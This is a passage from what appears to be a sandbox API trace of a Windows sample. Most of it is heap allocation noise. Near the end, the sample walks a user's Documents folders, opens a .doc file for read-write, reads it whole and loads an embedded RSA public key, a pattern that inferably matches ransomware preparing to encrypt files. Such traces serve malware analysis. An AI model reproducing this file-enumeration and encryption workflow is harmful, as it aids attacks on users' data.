(HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.536] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\") returned="UHfBjIaC\\" [0192.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.537] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0192.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41b60 [0192.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.538] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b60 | out: hHeap=0x6a0000) returned 1 [0192.538] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.539] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.539] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.539] PathFindFileNameW (pszPath="") returned="" [0192.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.539] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.543] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.543] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bf4450, ftCreationTime.dwHighDateTime=0x1d89c09, ftLastAccessTime.dwLowDateTime=0x5eaea0b0, ftLastAccessTime.dwHighDateTime=0x1d8a419, ftLastWriteTime.dwLowDateTime=0x5eaea0b0, ftLastWriteTime.dwHighDateTime=0x1d8a419, nFileSizeHigh=0x0, nFileSizeLow=0x5dee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eE nQNbY2KI.doc", cAlternateFileName="EENQNB~1.DOC")) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x751d68 [0192.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.544] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\eE nQNbY2KI.doc") returned=".doc" [0192.544] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\eE nQNbY2KI.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\ee nqnby2ki.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.545] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=24046) returned 1 [0192.545] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.548] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5dc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.548] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.550] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.550] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5dee, lpOverlapped=0x0) returned 1 [0192.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.552] lstrlenA (lpString="-----BEGIN PUBLIC 